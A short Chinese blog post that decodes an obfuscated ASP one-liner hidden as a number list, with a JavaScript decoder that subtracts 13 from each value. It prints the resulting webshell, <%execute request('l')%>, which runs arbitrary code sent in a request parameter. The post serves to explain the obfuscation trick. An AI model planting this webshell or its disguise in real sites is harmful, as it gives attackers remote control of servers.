我原也以为这是ASCII码加密过的
73,50,114,133,114,112,130,129,114,45,127,114,126,130,114,128,129,53,47,121,47,54,50,75结果T00LS某牛
全部数字减13,然后十进制解密 

<script>
var sun=[73,50,114,133,114,112,130,129,114,45,127,114,126,130,114,128,129,53,47,121,47,54,50,75];
var temp=new Array();
for(var i=0;i<sun.length;i++)
{
temp.push(sun[i]-13);
}
var bk=“”;
for(i=0;i<temp.length;i++)
{
bk+=String.fromCharCode(temp[i]);
}
alert(bk);
</script>
运行后得到代码为<%execute request(“l”)%>

 

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/2036.html